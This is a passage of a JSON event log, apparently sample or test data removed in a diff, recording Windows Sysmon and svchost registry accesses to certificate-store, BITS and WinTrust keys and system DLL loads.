"registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "xmllite.dll", - "image_path": "C:\\Windows\\System32\\xmllite.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\PerfMMFileName", - "registry_value": "PerfMMFileName", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883570877610000, - "unique_pid": 
"{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", - "registry_value": "BITS", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 
131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - 
"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "FirewallAPI.dll", - "image_path": "C:\\Windows\\System32\\FirewallAPI.dll", - "pid": 3980, - "process_name": "svchost.exe", - 
"process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "esent.dll", - "image_path": "C:\\Windows\\System32\\esent.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": 
"C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "fwbase.dll", - "image_path": "C:\\Windows\\System32\\fwbase.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
